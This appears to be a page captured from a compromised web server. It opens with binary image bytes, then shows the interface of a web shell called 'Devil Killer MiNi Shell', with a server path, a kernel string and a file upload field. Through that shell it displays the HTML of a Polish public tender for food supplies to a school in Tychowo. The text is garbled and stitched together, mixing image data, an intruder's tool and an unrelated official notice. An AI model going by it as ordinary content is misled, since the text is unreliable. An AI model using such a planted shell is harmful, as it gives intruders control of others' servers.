JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231130/0052459601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zakup i sukcesywna dostawa artykułów żywnościowych na potrzeby żywienia zbiorowego dzieci i młodzieży w Szkole Podstawowej im. Adama Mickiewicza w Tychowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa im. Adama Mickiewicza w Tychowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000270320</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tychowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">943439380</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sptychowo@interia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://sptychowo.edupage.org/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i sukcesywna dostawa artykułów żywnościowych na potrzeby żywienia zbiorowego dzieci i młodzieży w Szkole Podstawowej im. Adama Mickiewicza w Tychowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5e989e36-8f5b-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00524596</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5e989e36-8f5b-11ee-b55a-a22b2d7f700e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem https://ezamowienia.gov.pl<br/><br/>1) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu Wykonawca na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformie e-Zamówienia, dostępny	na	stronie	internetowej https://ezamowienia.gov.pl oraz w zakładce „Centrum Pomocy”.<br/><br/>2)	Wszelka korespondencja kierowana do zamawiającego powinna być sygnowana wskazanym nr referencyjnym sprawy: SP.226.1.2023</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem https://ezamowienia.gov.pl<br/><br/>1) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu Wykonawca na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformie e-Zamówienia, dostępny	na	stronie	internetowej https://ezamowienia.gov.pl oraz w zakładce „Centrum Pomocy”.<br/>2)	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993r. <br/>o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2022 r. poz. 1233) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je <br/>w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/><br/>2.	Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce<br/>„Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/> <br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawców wspólnie ubiegającego się <br/>o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). Możliwość korzystania <br/>w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie <br/>e- Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/><br/>3.	Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/><br/>4.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/><br/>5.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania <br/>z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/><br/>6.	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl <br/>w zakładce „Zgłoś problem”.<br/><br/>7.	W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy <br/>i zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: sptychowo@interia.pl, (nie dotyczy składania ofert ).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-5e989e36-8f5b-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), zwanego dalej &#34;RODO&#34;, w celu umożliwienia korzystania za środków ochrony prawnej, <br/>o których mowa w ustawie, do upływu terminu na ich wniesienie. 5. Administratorem Pani/Pana danych osobowych jest: Szkoła Podstawowa im Adama Mickiewicza <br/>w Tychowie.<br/>2. Kontakt z Administratorem Danych możliwy jest za pośrednictwem IODO pod adresem e-mail: iodo@tychowo.pl informuję, iż:<br/>1)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. a RODO,<br/> w celu realizacji zadań szkolnictwa,<br/>2)	Dane osobowe Pani/Pana oraz innych osób, znajdujące się w dobrowolnie dostarczonych przez Pana/Panią dokumentach, przetwarzane będą na podstawie art. 6 ust. 1 lit. b RODO, w celu wykonywania powierzonego zadania,<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO, w celu wypełnienia obowiązków ciążących na Administratorze.<br/>4)	Odbiorcami Pani/Pana danych osobowych będą osoby upoważnione przez Administratora danych osobowych do ich przetwarzania oraz organy administracji publicznej, a w szczególności: Sądy ,Urząd Skarbowy, urząd miasta, oświata, operatorzy pocztowi, przewoźnicy, banki, partnerzy świadczący usługi techniczne celem realizacji zadań. Możemy również przekazać Dane Osobowe organom publicznym walczącym z oszustwami i nadużyciami.<br/>5)	Posiada Pan/Pani prawo do: żądania od administratora dostępu do danych osobowych, prawo do ich sprostowania, usunięcia lub ograniczenia przetwarzania, prawo do wniesienia sprzeciwu wobec przetwarzania, prawo do przenoszenia danych, prawo do cofnięcia udzielonej zgody w dowolnym momencie.(Art.,16,17)<br/>6)	Ma Pan/Pani prawo wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu Ochrony Danych Osobowych.<br/>7)	Podanie danych osobowych jest wymogiem niezbędnym do zawarcia współpracy – sprzedażowej. Konsekwencją nie podania Pani/Pana danych osobowych będzie brak możliwości sprzedaży i wysyłki procedur.<br/>8)	Pana/Pani dane osobowe nie będą poddane zautomatyzowanym podejmowaniu decyzji (profilowaniu).<br/>9)	Pana/Pani dane osobowe nie będą przekazane odbiorcy w państwie trzecim lub organizacji Pozarządowej.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SP.226.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1. MIĘSO, WĘDLINY, DRÓB - wszystkie produkty muszą być najwyższej jakości; barwa mięsa świeżego powinna być bladoróżowa do czerwonej, soczyste. Barwa, zapach, konsystencja, powierzchnia i przekrój mają świadczyć o świeżości produktu; wędliny konsystencja ścisła, barwa na przekroju jasno różowa, smak i zapach charakterystyczny dla mięsa peklowanego, parzonego i użytych przypraw, dopuszczalne pojedyncze skupiska galarety. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W celu wyboru najkorzystniejszej oferty zamawiający przyjął następujące kryteria, przypisując im odpowiednio wagi procentowe:<br/>Dla wszystkich część zamówienia:<br/>a)	cena brutto za realizację całego zamówienia – 60%<br/>b)	termin płatności – 40%<br/><br/>2.	Zasady oceny ofert według ustalonych kryteriów<br/>Całkowita liczba punktów, jaka otrzyma oferta, zostanie obliczona według wzoru:<br/>Lp = C + D<br/>gdzie:<br/>Lp – całkowita liczba uzyskanych punktów;<br/>C – punkty uzyskane w kryterium ceny brutto oferty;<br/>D – punkty uzyskane w kryterium termin dostawy<br/><br/>a) punkty w kryterium	cena brutto za realizację całego zamówienia zostanie wyliczona według następującego wzoru:<br/><br/> najniższa cena ofertowa brutto<br/>C = ---------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej<br/>gdzie:<br/> <br/> <br/>C – wskaźnik kryterium ceny w punktach; 60% - waga kryterium w procentach<br/>Z tytułu kryterium ceny Wykonawca może uzyskać maksymalnie 60 punktów.<br/>b)	punkty w kryterium termin płatności zostaną przyznane zgodnie z zasadą:<br/><br/>Jeżeli Wykonawca zadeklaruje:<br/>oferowany termin płatności wynoszący 14 dni - 0 pkt; oferowany termin płatności wynoszący 21 dni	- 20 pkt; oferowany termin płatności wynoszący 30 dni	- 40 pkt<br/><br/>UWAGA !<br/><br/>Termin płatności, jaki mogą zaoferować Wykonawcy może wynosić jedynie 14, 21 albo 30 dni.<br/>Oferta Wykonawcy, który:<br/>1)	Zaoferuje inny termin płatności niż określony pkt. 2 lit. b<br/>2)	nie zaproponuje żadnego terminu<br/>zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy.<br/><br/><br/>Z tytułu kryterium termin dostawy Wykonawca może uzyskać maksymalnie 40 punktów.<br/><br/>3.	Każda część zamówienia podlegać będzie oddzielnej ocenie i dla każdej z części zostanie przyznana punktacja.<br/> <br/>4.	Za najkorzystniejszą zostanie uznana oferta, która nie zostanie odrzucona, spełni wymogi Ustawy oraz uzyska łącznie najwyższą liczbę punktów.<br/>5.	Oferta najkorzystniejsza może uzyskać maksymalnie 100 punktów.<br/>6.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2. OWOCE I WARZYWA - Wszystkie produkty muszą być najwyższej jakości, owoce, warzywa, powinny być niezwiędnięte, bez uszkodzeń zewnętrznych; owoce kulisto-stożkowate dopuszcza się nieregularne, intensywny kolor, soczyste. Warzywa korzenne - korzenie powinny być jędrne, niepopękane, nie sparciałe, bez uszkodzeń przez szkodniki, bez plam. Warzywa- klasy pierwszej, nie powinny być zaparzone, zamarznięte, zapleśniałe, Fasola- nasiona nie powinny być zbutwiałe, spleśniałe. Owoce, warzywa liściaste – bez plam, zdrowe, bez uszkodzeń. Ziemniaki powinny być zdrowe, kształtne, suche, czyste bez ziemi, piasku, nieuszkodzone, jednolitej odmiany, kształt owalny, bez oznak zgnilizny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W celu wyboru najkorzystniejszej oferty zamawiający przyjął następujące kryteria, przypisując im odpowiednio wagi procentowe:<br/>Dla wszystkich część zamówienia:<br/>a)	cena brutto za realizację całego zamówienia – 60%<br/>b)	termin płatności – 40%<br/><br/>2.	Zasady oceny ofert według ustalonych kryteriów<br/>Całkowita liczba punktów, jaka otrzyma oferta, zostanie obliczona według wzoru:<br/>Lp = C + D<br/>gdzie:<br/>Lp – całkowita liczba uzyskanych punktów;<br/>C – punkty uzyskane w kryterium ceny brutto oferty;<br/>D – punkty uzyskane w kryterium termin dostawy<br/><br/>a) punkty w kryterium	cena brutto za realizację całego zamówienia zostanie wyliczona według następującego wzoru:<br/><br/> najniższa cena ofertowa brutto<br/>C = ---------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej<br/>gdzie:<br/> <br/> <br/>C – wskaźnik kryterium ceny w punktach; 60% - waga kryterium w procentach<br/>Z tytułu kryterium ceny Wykonawca może uzyskać maksymalnie 60 punktów.<br/>b)	punkty w kryterium termin płatności zostaną przyznane zgodnie z zasadą:<br/><br/>Jeżeli Wykonawca zadeklaruje:<br/>oferowany termin płatności wynoszący 14 dni - 0 pkt; oferowany termin płatności wynoszący 21 dni	- 20 pkt; oferowany termin płatności wynoszący 30 dni	- 40 pkt<br/><br/>UWAGA !<br/><br/>Termin płatności, jaki mogą zaoferować Wykonawcy może wynosić jedynie 14, 21 albo 30 dni.<br/>Oferta Wykonawcy, który:<br/>1)	Zaoferuje inny termin płatności niż określony pkt. 2 lit. b<br/>2)	nie zaproponuje żadnego terminu<br/>zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy.<br/><br/><br/>Z tytułu kryterium termin dostawy Wykonawca może uzyskać maksymalnie 40 punktów.<br/><br/>3.	Każda część zamówienia podlegać będzie oddzielnej ocenie i dla każdej z części zostanie przyznana punktacja.<br/> <br/>4.	Za najkorzystniejszą zostanie uznana oferta, która nie zostanie odrzucona, spełni wymogi Ustawy oraz uzyska łącznie najwyższą liczbę punktów.<br/>5.	Oferta najkorzystniejsza może uzyskać maksymalnie 100 punktów.<br/>6.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3. ARTYKUŁY SPOŻYWCZE – Wszystkie produkty muszą być najwyższej jakości przyprawy zapach świeży po otwarciu produktów, bez oznak spleśnienia, grudek, produkty gotowane sypkie, bez sklejania się twarde sprężyste, produkty z puszek bez pleśni, mętnej konsystencji; oleje i roślinne - olej przejrzysty, tłuszcze dobrej jakości nie zjełczałe; produkty przemiału ziarna zachowują naturalny zapach i kolor, mąka sypka konsystencja, drobna granulacja, czysta; makarony sporządzone z najwyższej jakości mąki, zawiera pszenice durum, po ugotowaniu nie skleja się, jest twardy i sprężysty. </p> <h3 class="mb-0">4.2.6.) Główny kod 